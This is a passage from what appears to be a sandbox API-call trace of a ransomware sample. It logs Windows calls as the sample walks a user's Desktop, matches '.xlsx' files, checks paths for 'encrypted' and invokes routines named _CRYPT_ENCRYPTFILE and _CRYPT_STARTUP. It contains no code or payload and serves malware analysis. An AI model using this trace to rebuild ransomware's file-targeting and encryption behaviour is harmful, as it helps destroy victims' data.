dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15ee7920, ftCreationTime.dwHighDateTime=0x1d5c4c1, ftLastAccessTime.dwLowDateTime=0x3fe3c5a0, ftLastAccessTime.dwHighDateTime=0x1d5b756, ftLastWriteTime.dwLowDateTime=0x3fe3c5a0, ftLastWriteTime.dwHighDateTime=0x1d5b756, nFileSizeHigh=0x0, nFileSizeLow=0x17922, dwReserved0=0x0, dwReserved1=0x777648, cFileName="T 5FxqsHMby.xlsx", cAlternateFileName="T5FXQS~1.XLS")) returned 0x7c20c0 [0031.806] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15ee7920, ftCreationTime.dwHighDateTime=0x1d5c4c1, ftLastAccessTime.dwLowDateTime=0x3fe3c5a0, ftLastAccessTime.dwHighDateTime=0x1d5b756, ftLastWriteTime.dwLowDateTime=0x3fe3c5a0, ftLastWriteTime.dwHighDateTime=0x1d5b756, nFileSizeHigh=0x0, nFileSizeLow=0x17922, dwReserved0=0x0, dwReserved1=0x777648, cFileName="T 5FxqsHMby.xlsx", cAlternateFileName="T5FXQS~1.XLS")) returned 0x7c20c0 [0031.806] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FxqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xqsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qsHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sHMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HMby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mby.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.808] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.809] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.809] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0031.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.809] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\T 5FxqsHMby.xlsx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15ee7920, ftCreationTime.dwHighDateTime=0x1d5c4c1, ftLastAccessTime.dwLowDateTime=0x3fe3c5a0, ftLastAccessTime.dwHighDateTime=0x1d5b756, ftLastWriteTime.dwLowDateTime=0x3fe3c5a0, ftLastWriteTime.dwHighDateTime=0x1d5b756, nFileSizeHigh=0x0, nFileSizeLow=0x17922, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="T 5FxqsHMby.xlsx", cAlternateFileName="T5FXQS~1.XLS")) returned 0x7c2100 [0031.809] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.810] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.810] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.810] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.810] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.810] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, 